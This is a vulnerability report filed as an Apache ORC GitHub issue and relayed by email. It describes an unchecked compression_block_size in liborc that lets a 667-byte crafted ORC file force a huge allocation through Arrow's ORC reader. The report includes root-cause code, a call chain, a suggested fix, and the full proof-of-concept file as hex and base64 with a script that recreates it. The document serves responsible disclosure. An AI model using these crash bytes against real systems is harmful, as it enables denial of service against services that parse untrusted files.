OwenSanzas opened a new issue, #2650:
URL: https://github.com/apache/orc/issues/2650

   
   ## Summary
   
   A 667-byte crafted ORC file makes `arrow::adapters::orc::ORCFileReader::Open`
   attempt a ~57 TB heap allocation while decoding the file footer, because the
   bundled liborc reader trusts the attacker-supplied PostScript
   `compression_block_size` with no upper bound. Any application that opens an
   untrusted ORC file through Arrow's public ORC reader can be driven into an
   out-of-memory abort / denial of service by a tiny input.
   
   The defective code is in the bundled **Apache ORC** C++ library (liborc),
   reachable through Arrow's public API. The fix belongs in apache/orc; this 
report
   should be filed against **apache/orc** as well as apache/arrow (which 
bundles it).
   Tested at apache/arrow pinned commit 
`16fe34250a2ef261790b9cc414fdf0831669cf9f`
   (25.0.0-SNAPSHOT; `ARROW_DEPENDENCY_SOURCE=BUNDLED` -> orc-format 1.1.1).
   
   ## Root Cause
   
   The ORC PostScript carries a `compression_block_size` (`uint64`). When liborc
   decodes the footer it reads this field verbatim and feeds it straight into a
   decompression-buffer allocation that happens **before any compressed data is
   read**, so the entire attacker-declared block size is allocated up front:
   
   - `getCompressionBlockSize()` returns `ps.compression_block_size()` with no
     bound check (only a 256 KiB default when the field is absent) — 
`c++/src/Reader.cc:59`.
   - `readFooter()` passes that value as the `blockSize` argument to
     `createDecompressor()` — `c++/src/Reader.cc:1357`.
   - For `compression = ZLIB`, `createDecompressor()` builds a
     `ZlibDecompressionStream` (`c++/src/Compression.cc:1293`); its base
     `DecompressionStream` constructor eagerly constructs
     `outputDataBuffer(pool, bufferSize)` — `c++/src/Compression.cc:463`.
   - `DataBuffer<char>::reserve()` then calls `memoryPool_.malloc(sizeof(char) 
* newCapacity)`
     — `c++/src/MemoryPool.cc:106` — with `newCapacity` equal to the declared 
block
     size, before a single byte of footer is decompressed.
   
   Vulnerable code (`c++/src/Reader.cc:59`):
   
   ```cpp
   uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
     if (ps.has_compression_block_size()) {
       return ps.compression_block_size();   // attacker-controlled, unbounded
     } else {
       return 256 * 1024;
     }
   }
   ```
   
   Eager allocation (`c++/src/Compression.cc:463` -> 
`c++/src/MemoryPool.cc:106`):
   
   ```cpp
   // Compression.cc — DecompressionStream ctor allocates the full block up 
front
   
DecompressionStream::DecompressionStream(std::unique_ptr<SeekableInputStream> 
inStream,
                                            size_t bufferSize, MemoryPool& pool,
                                            ReaderMetrics* metrics)
       : pool(pool),
         input(std::move(inStream)),
         outputDataBuffer(pool, bufferSize),   // bufferSize == 
compression_block_size
         ...
   
   // MemoryPool.cc — reserve() mallocs the whole capacity before any data is 
read
   template <class T>
   void DataBuffer<T>::reserve(uint64_t newCapacity) {
     if (newCapacity > currentCapacity_ || !buf_) {
       ...
       buf_ = reinterpret_cast<T*>(memoryPool_.malloc(sizeof(T) * newCapacity));
       currentCapacity_ = newCapacity;
     }
   }
   ```
   
   Call chain (attacker bytes -> fault):
   
   ```
   arrow::adapters::orc::ORCFileReader::Open        adapter.cc:568  (public API)
     -> ORCFileReader::Impl::Open                    adapter.cc:218
       -> orc::createReader                          Reader.cc:1421
         -> orc::readFooter                          Reader.cc:1357   
getCompressionBlockSize(ps)
           -> orc::createDecompressor                Compression.cc:1293
             -> orc::ZlibDecompressionStream::ctor   Compression.cc:694
               -> orc::DecompressionStream::ctor     Compression.cc:463
                 -> orc::DataBuffer<char>::DataBuffer MemoryPool.cc:57
                   -> orc::DataBuffer<char>::reserve  MemoryPool.cc:106  -> 
malloc(bufferSize)
   ```
   
   liborc never validates the declared block size against the remaining
   file / footer length before allocating.
   
   ## PoC
   
   A 667-byte crafted ORC file: a valid `ORC` magic plus a PostScript declaring
   `compression = ZLIB` and an attacker-chosen `compression_block_size`
   (`0x33ffdbbd0000` ~ 57 TB after the buffer math).
   
   ```python
   # generate_poc.py — re-create the crash input from bytes
   import binascii
   
   POC_HEX = (
       
"4f52431100000a061204080550003b00000a1b0a0300000012140805120e080310feffffff0f"
       
"1882808080105000300000e392e2626660601012e66015e2e56012f8f71f0a180318002b0000"
       
"e352e76262601052e4609592e6648080064108fda15e12c6086000004700000a210a05000000"
       
"00001218080522120a00120bc3bc6ec3af63c3b664c3a9189c0150002700000a110a04000000"
       
"00120908052a030a010350002800002b63616060600262662066036286ffffffff0300200000"
       
"fbc7c2c4c400018c30bafe3f18fc0600360000636000811ff6608a81a141bef575e00e394e07"
       
"08f7433d549c01000f00004e040102000b402800004b4c4a3abc27eff0fae4c3db520eafaca0"
       
"100000050000ffa8a20000e362e360136090e0e602d18c120a609a49421a4c334bc883691609"
       
"3530cd2a2106a41981eac4c1349384309866969003d24c40755c603e0b549e55825588858341"
       
"800148322191c82240b614b3bb6f0800c40000e3aae462e1600d60e01ae16015e2e36016f8f7"
       
"ffff7f7e89a686860601a0a83050949783092c0a068c4041450e5629694e0608681084d01fea"
       
"25610ca012090e5625212e0621eec37bf20eaf4f3ebc2de5f04a893920cd9c1cac5acc5c8ccc"
       
"010c00680100e3601678cc24c5cdc12cb09051224f212b835549858347889591899985558a39"
       
"d3d8084898994831a70109c66229c62405060d060306250e0e66388b05ce6283b3d8e12c0608"
       
"cb80d58a85833580c14a848355880f68e1bffffffff34b343534340800458581a2bc1c4c6051"
       
"3060040a2a72b04a4973324040832084fe502f096300954870b02a09713008711fde9377787d"
       
"f2e16d2987574acc0169e6e460d562e662640e607098e0e7c198c46aa467a067080008b70110"
       "01188080f4ddfdff0c2865300682f403034f524318"
   )
   data = binascii.unhexlify(POC_HEX)
   assert len(data) == 667, len(data)
   open("poc.bin", "wb").write(data)
   ```
   
   Crash input size: 667 bytes (`poc/poc.bin`, md5 
`ec35f54cd76777e4f34f68f79c714a4e`).
   The PostScript declares `compression_block_size` such that the decompression
   buffer math requests `0x33ffdbbd0000` (~57 TB).
   
   ## Reproduction
   
   Build Arrow C++ from source with `-DARROW_ORC=ON` and AddressSanitizer, then 
open the attached ORC file
   through the public reader API:
   
   ```cpp
   #include <arrow/adapters/orc/adapter.h>
   // auto in = ...read poc.bin into a RandomAccessFile...;
   auto reader = arrow::adapters::orc::ORCFileReader::Open(in, 
arrow::default_memory_pool());  // huge alloc here
   ```
   
   liborc's `getCompressionBlockSize()` returns the attacker-controlled 
PostScript `compression_block_size`
   with no upper bound, fed to `DataBuffer<char>::reserve()` -> `malloc`:
   
   ```
   AddressSanitizer: requested allocation size 0x33ffdbbd0000 (~57 TB) exceeds 
maximum supported size
     DataBuffer<char>::reserve / readFooter (liborc Reader.cc)
     ORCFileReader::Open (cpp/src/arrow/adapters/orc/adapter.cc)
   ```
   
   From a 667-byte ORC file. The fix belongs in Apache ORC (liborc 
`getCompressionBlockSize`), reached via
   the Arrow ORC reader. PoC: 667 bytes (recreate from the base64 below).
   
   ## Suggested Fix
   
   The fix belongs in **Apache ORC (liborc)**, since the unbounded allocation 
lives
   there. Validate the declared `compression_block_size` against a sane upper 
bound
   and/or against the remaining footer/file length before constructing the
   decompression buffer, rejecting the file with a parse error otherwise. The 
check
   belongs in `getCompressionBlockSize()` (`Reader.cc:59`) or at the
   `createDecompressor` call site in `readFooter()` (`Reader.cc:1357`), so no 
caller
   can hand an unbounded `bufferSize` to `DecompressionStream`:
   
   ```diff
    uint64_t getCompressionBlockSize(const proto::PostScript& ps) {
      if (ps.has_compression_block_size()) {
   -    return ps.compression_block_size();
   +    uint64_t blockSize = ps.compression_block_size();
   +    // A compression block can never legitimately exceed the input; cap it 
so a
   +    // malicious PostScript cannot force an unbounded up-front allocation.
   +    if (blockSize > kMaxCompressionBlockSize) {
   +      throw ParseError("Invalid compression block size in PostScript");
   +    }
   +    return blockSize;
      } else {
        return 256 * 1024;
      }
    }
   ```
   
   (The exact bound is upstream's judgement.) Apache Arrow should pick up the 
fix
   when it bumps the bundled liborc; until then Arrow may also consider 
bounding the
   allocation at the adapter layer.
   
   ## PoC bytes (self-contained)
   
   The trigger input is **667 bytes** (`poc/poc.bin`).
   Recreate it exactly with:
   
   ```bash
   base64 -d > poc.bin <<'B64'
   
T1JDEQAACgYSBAgFUAA7AAAKGwoDAAAAEhQIBRIOCAMQ/v///w8YgoCAgBBQADAAAOOS4mJmYGAQEuZgFeLlYBL49x8KGAMYACsA
   
AONS52JiYBBS5GCVkuZkgIAGQQj9oV4SxghgAABHAAAKIQoFAAAAAAASGAgFIhIKABILw7xuw69jw7Zkw6kYnAFQACcAAAoRCgQA
   
AAAAEgkIBSoDCgEDUAAoAAArY2FgYGACYmYgZgNihv////8DACAAAPvHwsTEAAGMMLr+Pxj8BgA2AABjYACBH/ZgioGhQb71deAO
   
OU4HCPdDPVScAQAPAABOBAECAAtAKAAAS0xKOrwn7/D65MPbUg6vrKAQAAAFAAD/qKIAAONi42ATYJDg5gLRjBIKYJpJQhpMM0vI
   
g2kWCTUwzSohBqQZgerEwTSThDCYZpaQA9JMQHVcYD4LVJ5VglWIhYNBgAFIMiGRyCJAthSzu28IAMQAAOOq5GLhYA1g4BrhYBXi
   
42AW+Pf//39+iaaGhgYBoKgwUJSXgwksCgaMQEFFDlYpaU4GCGgQhNAf6iVhDKASCQ5WJSEuBiHuw3vyDq9PPrwt5fBKiTkgzZwc
   
rFrMXIzMAQwAaAEA42AWeMwkxc3BLLCQUSJPISuDVUmFg0eIlZGJmYVVijnT2AhImJlIMacBCcZiKcYkBQYNBgMGJQ4OZjiLBc5i
   
g7PY4SwGCMuA1YqFgzWAwUqEg1WID2jhv/////NLNDU0NAgARYWBorwcTGBRMGAECipysEpJczJAQIMghP5QLwljAJVIcLAqCXEw
   
CHEf3pN3eH3y4W0ph1dKzAFp5uRg1WLmYmQOYHCY4OfBmMRqpGegZwgACLcBEAEYgID03f3/DChlMAaC9AMDT1JDGA==
   B64
   ```
   
   ## Credit
   
   Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, 
Guido Vranken).
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

Reply via email to